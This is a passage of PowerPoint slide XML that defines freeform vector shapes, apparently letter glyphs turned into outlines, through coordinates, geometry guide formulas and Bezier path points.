            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId208"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2600325" y="1827213"/>
              <a:ext cx="90488" cy="131763"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 237 w 237"/>
                <a:gd name="T1" fmla="*/ 22 h 336"/>
                <a:gd name="T2" fmla="*/ 205 w 237"/>
                <a:gd name="T3" fmla="*/ 0 h 336"/>
                <a:gd name="T4" fmla="*/ 150 w 237"/>
                <a:gd name="T5" fmla="*/ 19 h 336"/>
                <a:gd name="T6" fmla="*/ 100 w 237"/>
                <a:gd name="T7" fmla="*/ 2 h 336"/>
                <a:gd name="T8" fmla="*/ 20 w 237"/>
                <a:gd name="T9" fmla="*/ 80 h 336"/>
                <a:gd name="T10" fmla="*/ 38 w 237"/>
                <a:gd name="T11" fmla="*/ 129 h 336"/>
                <a:gd name="T12" fmla="*/ 26 w 237"/>
                <a:gd name="T13" fmla="*/ 163 h 336"/>
                <a:gd name="T14" fmla="*/ 41 w 237"/>
                <a:gd name="T15" fmla="*/ 202 h 336"/>
                <a:gd name="T16" fmla="*/ 0 w 237"/>
                <a:gd name="T17" fmla="*/ 265 h 336"/>
                <a:gd name="T18" fmla="*/ 115 w 237"/>
                <a:gd name="T19" fmla="*/ 336 h 336"/>
                <a:gd name="T20" fmla="*/ 230 w 237"/>
                <a:gd name="T21" fmla="*/ 265 h 336"/>
                <a:gd name="T22" fmla="*/ 197 w 237"/>
                <a:gd name="T23" fmla="*/ 210 h 336"/>
                <a:gd name="T24" fmla="*/ 125 w 237"/>
                <a:gd name="T25" fmla="*/ 196 h 336"/>
                <a:gd name="T26" fmla="*/ 88 w 237"/>
                <a:gd name="T27" fmla="*/ 196 h 336"/>
                <a:gd name="T28" fmla="*/ 73 w 237"/>
                <a:gd name="T29" fmla="*/ 195 h 336"/>
                <a:gd name="T30" fmla="*/ 53 w 237"/>
                <a:gd name="T31" fmla="*/ 186 h 336"/>
                <a:gd name="T32" fmla="*/ 45 w 237"/>
                <a:gd name="T33" fmla="*/ 165 h 336"/>
                <a:gd name="T34" fmla="*/ 51 w 237"/>
                <a:gd name="T35" fmla="*/ 142 h 336"/>
                <a:gd name="T36" fmla="*/ 100 w 237"/>
                <a:gd name="T37" fmla="*/ 158 h 336"/>
                <a:gd name="T38" fmla="*/ 180 w 237"/>
                <a:gd name="T39" fmla="*/ 80 h 336"/>
                <a:gd name="T40" fmla="*/ 164 w 237"/>
                <a:gd name="T41" fmla="*/ 33 h 336"/>
                <a:gd name="T42" fmla="*/ 206 w 237"/>
                <a:gd name="T43" fmla="*/ 20 h 336"/>
                <a:gd name="T44" fmla="*/ 222 w 237"/>
                <a:gd name="T45" fmla="*/ 38 h 336"/>
                <a:gd name="T46" fmla="*/ 237 w 237"/>
                <a:gd name="T47" fmla="*/ 22 h 336"/>
                <a:gd name="T48" fmla="*/ 155 w 237"/>
                <a:gd name="T49" fmla="*/ 80 h 336"/>
                <a:gd name="T50" fmla="*/ 100 w 237"/>
                <a:gd name="T51" fmla="*/ 137 h 336"/>
                <a:gd name="T52" fmla="*/ 45 w 237"/>
                <a:gd name="T53" fmla="*/ 80 h 336"/>
                <a:gd name="T54" fmla="*/ 100 w 237"/>
                <a:gd name="T55" fmla="*/ 23 h 336"/>
                <a:gd name="T56" fmla="*/ 155 w 237"/>
                <a:gd name="T57" fmla="*/ 80 h 336"/>
                <a:gd name="T58" fmla="*/ 210 w 237"/>
                <a:gd name="T59" fmla="*/ 265 h 336"/>
                <a:gd name="T60" fmla="*/ 115 w 237"/>
                <a:gd name="T61" fmla="*/ 315 h 336"/>
                <a:gd name="T62" fmla="*/ 20 w 237"/>
                <a:gd name="T63" fmla="*/ 265 h 336"/>
                <a:gd name="T64" fmla="*/ 43 w 237"/>
                <a:gd name="T65" fmla="*/ 224 h 336"/>
                <a:gd name="T66" fmla="*/ 101 w 237"/>
                <a:gd name="T67" fmla="*/ 215 h 336"/>
                <a:gd name="T68" fmla="*/ 210 w 237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6">
                  <a:moveTo>
                    <a:pt x="237" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="12"/>
                    <a:pt x="228" y="0"/>
                    <a:pt x="205" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="0"/>
                    <a:pt x="175" y="0"/>
                    <a:pt x="150" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="11"/>
                    <a:pt x="122" y="2"/>
                    <a:pt x="100" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="2"/>
                    <a:pt x="20" y="38"/>
                    <a:pt x="20" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="101"/>
                    <a:pt x="28" y="116"/>
                    <a:pt x="38" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="139"/>
                    <a:pt x="26" y="150"/>
                    <a:pt x="26" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="180"/>
                    <a:pt x="33" y="192"/>
                    <a:pt x="41" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="227"/>
                    <a:pt x="0" y="260"/>
                    <a:pt x="0" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="307"/>
                    <a:pt x="52" y="336"/>
                    <a:pt x="115" y="336"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="336"/>
                    <a:pt x="230" y="307"/>
                    <a:pt x="230" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="247"/>
                    <a:pt x="221" y="223"/>
                    <a:pt x="197" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="207"/>
                    <a:pt x="170" y="196"/>
                    <a:pt x="125" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88" y="196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="196"/>
                    <a:pt x="77" y="196"/>
                    <a:pt x="73" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="195"/>
                    <a:pt x="60" y="195"/>
                    <a:pt x="53" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="177"/>
                    <a:pt x="45" y="165"/>
                    <a:pt x="45" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="162"/>
                    <a:pt x="47" y="154"/>
                    <a:pt x="51" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="147"/>
                    <a:pt x="76" y="158"/>
                    <a:pt x="100" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="158"/>
                    <a:pt x="180" y="123"/>
                    <a:pt x="180" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="65"/>
                    <a:pt x="175" y="51"/>
                    <a:pt x="164" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="24"/>
                    <a:pt x="194" y="21"/>
                    <a:pt x="206" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="35"/>
                    <a:pt x="218" y="38"/>
                    <a:pt x="222" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="38"/>
                    <a:pt x="237" y="34"/>
                    <a:pt x="237" y="22"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="155" y="80"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="112"/>
                    <a:pt x="129" y="137"/>
                    <a:pt x="100" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="137"/>
                    <a:pt x="45" y="110"/>
                    <a:pt x="45" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="48"/>
                    <a:pt x="70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89"/>
                    <a:pt x="170" y="315"/>
                    <a:pt x="115" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="315"/>
                    <a:pt x="20" y="289"/>
                    <a:pt x="20" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="254"/>
                    <a:pt x="25" y="236"/>
                    <a:pt x="43" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="216"/>
                    <a:pt x="62" y="215"/>
                    <a:pt x="101" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="215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3" name="Freeform 1214">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E92A1ED-6606-4E8B-A94F-92C8D7ADF594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2705100" y="1828800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10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4" name="Freeform 1215">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED57166A-F46E-4464-9BF3-E4B186713298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2798762" y="1804988"/>
              <a:ext cx="80963" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 208 w 208"/>
                <a:gd name="T1" fmla="*/ 216 h 278"/>
                <a:gd name="T2" fmla="*/ 195 w 208"/>
                <a:gd name="T3" fmla="*/ 201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3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6 h 278"/>
                <a:gd name="T38" fmla="*/ 133 w 208"/>
                <a:gd name="T39" fmla="*/ 278 h 278"/>
                <a:gd name="T40" fmla="*/ 208 w 208"/>
                <a:gd name="T41" fmla="*/ 21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1"/>
                    <a:pt x="149" y="257"/>
                    <a:pt x="136" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="257"/>
                    <a:pt x="91" y="227"/>
                    <a:pt x="91" y="213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6"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="261"/>
                    <a:pt x="98" y="278"/>
                    <a:pt x="133" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="278"/>
                    <a:pt x="208" y="258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5" name="Freeform 1216">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF95B9D3-B450-4B2C-85A1-7481F783B1A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId211"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3003550" y="182880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5 h 219"/>
                <a:gd name="T8" fmla="*/ 83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4 h 219"/>
                <a:gd name="T20" fmla="*/ 0 w 232"/>
                <a:gd name="T21" fmla="*/ 156 h 219"/>
                <a:gd name="T22" fmla="*/ 80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3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6 h 219"/>
                <a:gd name="T38" fmla="*/ 155 w 232"/>
                <a:gd name="T39" fmla="*/ 104 h 219"/>
                <a:gd name="T40" fmla="*/ 155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6" name="Freeform 1217">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{343E666A-83A5-49A0-B01E-F85363295008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3101975" y="1793875"/>
              <a:ext cx="90488" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 235 w 235"/>
                <a:gd name="T1" fmla="*/ 293 h 307"/>
                <a:gd name="T2" fmla="*/ 220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8 w 235"/>
                <a:gd name="T11" fmla="*/ 0 h 307"/>
                <a:gd name="T12" fmla="*/ 122 w 235"/>
                <a:gd name="T13" fmla="*/ 11 h 307"/>
                <a:gd name="T14" fmla="*/ 138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0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6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2 w 235"/>
                <a:gd name="T41" fmla="*/ 110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20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7"/>
                    <a:pt x="121" y="89"/>
                    <a:pt x="100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59"/>
                    <a:pt x="44" y="307"/>
                    <a:pt x="96" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="307"/>
                    <a:pt x="143" y="294"/>
                    <a:pt x="166" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="298"/>
                    <a:pt x="166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2" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="110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7" name="Freeform 1218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E69C17C3-D5E5-4DBC-B698-273B766668BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId213"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3201987" y="1793875"/>
              <a:ext cx="90488" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 235 w 235"/>
                <a:gd name="T1" fmla="*/ 293 h 307"/>
                <a:gd name="T2" fmla="*/ 219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5 w 235"/>
                <a:gd name="T9" fmla="*/ 0 h 307"/>
                <a:gd name="T10" fmla="*/ 138 w 235"/>
                <a:gd name="T11" fmla="*/ 0 h 307"/>
                <a:gd name="T12" fmla="*/ 122 w 235"/>
                <a:gd name="T13" fmla="*/ 11 h 307"/>
                <a:gd name="T14" fmla="*/ 137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0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1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6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2 w 235"/>
                <a:gd name="T41" fmla="*/ 110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19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5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7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7"/>
                    <a:pt x="121" y="89"/>
                    <a:pt x="100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59"/>
                    <a:pt x="44" y="307"/>
                    <a:pt x="96" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="307"/>
                    <a:pt x="143" y="294"/>
                    <a:pt x="166" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="298"/>
                    <a:pt x="166" y="304"/>
                    <a:pt x="181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6" y="210"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="241"/>
                    <a:pt x="140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2" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="110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8" name="Freeform 1219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38201C1D-5892-4B52-9C8E-605A01ED2215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3302000" y="1828800"/>
              <a:ext cx="85725" cy="84138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1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4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5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8" y="51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5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="74"/>
                    <a:pt x="120" y="21"/>
                    <a:pt x="191" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="36"/>
                    <a:pt x="198" y="44"/>
                    <a:pt x="208" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217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9" name="Freeform 1220">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F93873A-B125-4E47-85C9-988FDD8EE41B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3405187" y="1828800"/>
              <a:ext cx="77788" cy="84138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0" name="Freeform 1221">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96978C1B-1681-4879-8259-025566EB5339}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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3509962" y="1828800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0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3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6 w 189"/>
                <a:gd name="T31" fmla="*/ 198 h 219"/>
                <a:gd name="T32" fmla="*/ 24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6" y="39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8"/>
                    <a:pt x="96" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="198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1" name="Freeform 1222">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8195755-2907-4950-A2FF-C9329FA9C2E3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3609975" y="1828800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4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2" name="Freeform 1223">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7844512-A1B1-41A6-93D1-F98A5726502E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3735387" y="1830388"/>
              <a:ext cx="20638" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 54 w 54"/>
                <a:gd name="T1" fmla="*/ 28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5 h 212"/>
                <a:gd name="T8" fmla="*/ 54 w 54"/>
                <a:gd name="T9" fmla="*/ 28 h 212"/>
                <a:gd name="T10" fmla="*/ 54 w 54"/>
                <a:gd name="T11" fmla="*/ 185 h 212"/>
                <a:gd name="T12" fmla="*/ 27 w 54"/>
                <a:gd name="T13" fmla="*/ 158 h 212"/>
                <a:gd name="T14" fmla="*/ 0 w 54"/>
                <a:gd name="T15" fmla="*/ 185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8"/>
                    <a:pt x="27" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="158"/>
                    <a:pt x="0" y="171"/>
                    <a:pt x="0" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="201"/>
                    <a:pt x="13" y="212"/>
                    <a:pt x="27" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="212"/>
                    <a:pt x="54" y="199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3" name="Freeform 1224">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A0B949-9105-4CD9-878D-AF9F94513087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4003675" y="1792288"/>
              <a:ext cx="82550" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 214 w 214"/>
                <a:gd name="T1" fmla="*/ 158 h 316"/>
                <a:gd name="T2" fmla="*/ 107 w 214"/>
                <a:gd name="T3" fmla="*/ 0 h 316"/>
                <a:gd name="T4" fmla="*/ 0 w 214"/>
                <a:gd name="T5" fmla="*/ 158 h 316"/>
                <a:gd name="T6" fmla="*/ 107 w 214"/>
                <a:gd name="T7" fmla="*/ 316 h 316"/>
                <a:gd name="T8" fmla="*/ 214 w 214"/>
                <a:gd name="T9" fmla="*/ 158 h 316"/>
                <a:gd name="T10" fmla="*/ 173 w 214"/>
                <a:gd name="T11" fmla="*/ 153 h 316"/>
                <a:gd name="T12" fmla="*/ 107 w 214"/>
                <a:gd name="T13" fmla="*/ 278 h 316"/>
                <a:gd name="T14" fmla="*/ 41 w 214"/>
                <a:gd name="T15" fmla="*/ 153 h 316"/>
                <a:gd name="T16" fmla="*/ 107 w 214"/>
                <a:gd name="T17" fmla="*/ 38 h 316"/>
                <a:gd name="T18" fmla="*/ 173 w 214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316">
                  <a:moveTo>
                    <a:pt x="214" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="65"/>
                    <a:pt x="162" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="0"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="251"/>
                    <a:pt x="52" y="316"/>
                    <a:pt x="107" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="316"/>
                    <a:pt x="214" y="250"/>
                    <a:pt x="214" y="158"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="173" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="222"/>
                    <a:pt x="143" y="278"/>
                    <a:pt x="107" y="278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="278"/>
                    <a:pt x="41" y="222"/>
                    <a:pt x="41" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="84"/>
                    <a:pt x="73" y="38"/>
                    <a:pt x="107" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="38"/>
                    <a:pt x="173" y="84"/>
                    <a:pt x="17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4" name="Freeform 1225">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21CDD489-250D-4EA0-8DF6-9DF592506541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4100512" y="1827213"/>
              <a:ext cx="90488" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 236 w 236"/>
                <a:gd name="T1" fmla="*/ 199 h 217"/>
                <a:gd name="T2" fmla="*/ 212 w 236"/>
                <a:gd name="T3" fmla="*/ 180 h 217"/>
                <a:gd name="T4" fmla="*/ 195 w 236"/>
                <a:gd name="T5" fmla="*/ 180 h 217"/>
                <a:gd name="T6" fmla="*/ 136 w 236"/>
                <a:gd name="T7" fmla="*/ 106 h 217"/>
                <a:gd name="T8" fmla="*/ 188 w 236"/>
                <a:gd name="T9" fmla="*/ 37 h 217"/>
                <a:gd name="T10" fmla="*/ 205 w 236"/>
                <a:gd name="T11" fmla="*/ 37 h 217"/>
                <a:gd name="T12" fmla="*/ 229 w 236"/>
                <a:gd name="T13" fmla="*/ 19 h 217"/>
                <a:gd name="T14" fmla="*/ 205 w 236"/>
                <a:gd name="T15" fmla="*/ 0 h 217"/>
                <a:gd name="T16" fmla="*/ 149 w 236"/>
                <a:gd name="T17" fmla="*/ 0 h 217"/>
                <a:gd name="T18" fmla="*/ 126 w 236"/>
                <a:gd name="T19" fmla="*/ 18 h 217"/>
                <a:gd name="T20" fmla="*/ 146 w 236"/>
                <a:gd name="T21" fmla="*/ 37 h 217"/>
                <a:gd name="T22" fmla="*/ 117 w 236"/>
                <a:gd name="T23" fmla="*/ 76 h 217"/>
                <a:gd name="T24" fmla="*/ 88 w 236"/>
                <a:gd name="T25" fmla="*/ 37 h 217"/>
                <a:gd name="T26" fmla="*/ 108 w 236"/>
                <a:gd name="T27" fmla="*/ 18 h 217"/>
                <a:gd name="T28" fmla="*/ 84 w 236"/>
                <a:gd name="T29" fmla="*/ 0 h 217"/>
                <a:gd name="T30" fmla="*/ 27 w 236"/>
                <a:gd name="T31" fmla="*/ 0 h 217"/>
                <a:gd name="T32" fmla="*/ 3 w 236"/>
                <a:gd name="T33" fmla="*/ 19 h 217"/>
                <a:gd name="T34" fmla="*/ 27 w 236"/>
                <a:gd name="T35" fmla="*/ 37 h 217"/>
                <a:gd name="T36" fmla="*/ 45 w 236"/>
                <a:gd name="T37" fmla="*/ 37 h 217"/>
                <a:gd name="T38" fmla="*/ 99 w 236"/>
                <a:gd name="T39" fmla="*/ 106 h 217"/>
                <a:gd name="T40" fmla="*/ 42 w 236"/>
                <a:gd name="T41" fmla="*/ 180 h 217"/>
                <a:gd name="T42" fmla="*/ 24 w 236"/>
                <a:gd name="T43" fmla="*/ 180 h 217"/>
                <a:gd name="T44" fmla="*/ 0 w 236"/>
                <a:gd name="T45" fmla="*/ 199 h 217"/>
                <a:gd name="T46" fmla="*/ 24 w 236"/>
                <a:gd name="T47" fmla="*/ 217 h 217"/>
                <a:gd name="T48" fmla="*/ 81 w 236"/>
                <a:gd name="T49" fmla="*/ 217 h 217"/>
                <a:gd name="T50" fmla="*/ 105 w 236"/>
                <a:gd name="T51" fmla="*/ 199 h 217"/>
                <a:gd name="T52" fmla="*/ 83 w 236"/>
                <a:gd name="T53" fmla="*/ 180 h 217"/>
                <a:gd name="T54" fmla="*/ 117 w 236"/>
                <a:gd name="T55" fmla="*/ 131 h 217"/>
                <a:gd name="T56" fmla="*/ 153 w 236"/>
                <a:gd name="T57" fmla="*/ 180 h 217"/>
                <a:gd name="T58" fmla="*/ 132 w 236"/>
                <a:gd name="T59" fmla="*/ 199 h 217"/>
                <a:gd name="T60" fmla="*/ 156 w 236"/>
                <a:gd name="T61" fmla="*/ 217 h 217"/>
                <a:gd name="T62" fmla="*/ 212 w 236"/>
                <a:gd name="T63" fmla="*/ 217 h 217"/>
                <a:gd name="T64" fmla="*/ 236 w 236"/>
                <a:gd name="T65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217">
                  <a:moveTo>
                    <a:pt x="236" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="180"/>
                    <a:pt x="221" y="180"/>
                    <a:pt x="212" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205" y="37"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="37"/>
                    <a:pt x="229" y="37"/>
                    <a:pt x="229" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="1"/>
                    <a:pt x="214" y="0"/>
                    <a:pt x="205" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="149" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="0"/>
                    <a:pt x="126" y="1"/>
                    <a:pt x="126" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="33"/>
                    <a:pt x="134" y="37"/>
                    <a:pt x="146" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="117" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88" y="37"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="37"/>
                    <a:pt x="108" y="33"/>
                    <a:pt x="108" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="1"/>
                    <a:pt x="93" y="0"/>
                    <a:pt x="84" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="27" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="0"/>
                    <a:pt x="3" y="1"/>
                    <a:pt x="3" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="37"/>
                    <a:pt x="19" y="37"/>
                    <a:pt x="27" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="180"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="180"/>
                    <a:pt x="0" y="180"/>
                    <a:pt x="0" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="217"/>
                    <a:pt x="16" y="217"/>
                    <a:pt x="24" y="217"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="217"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="217"/>
                    <a:pt x="105" y="217"/>
                    <a:pt x="105" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="183"/>
                    <a:pt x="96" y="180"/>
                    <a:pt x="83" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="117" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="180"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="181"/>
                    <a:pt x="132" y="184"/>
                    <a:pt x="132" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="217"/>
                    <a:pt x="147" y="217"/>
                    <a:pt x="156" y="217"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="212" y="217"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="217"/>
                    <a:pt x="236" y="217"/>
                    <a:pt x="236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5" name="Freeform 1226">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
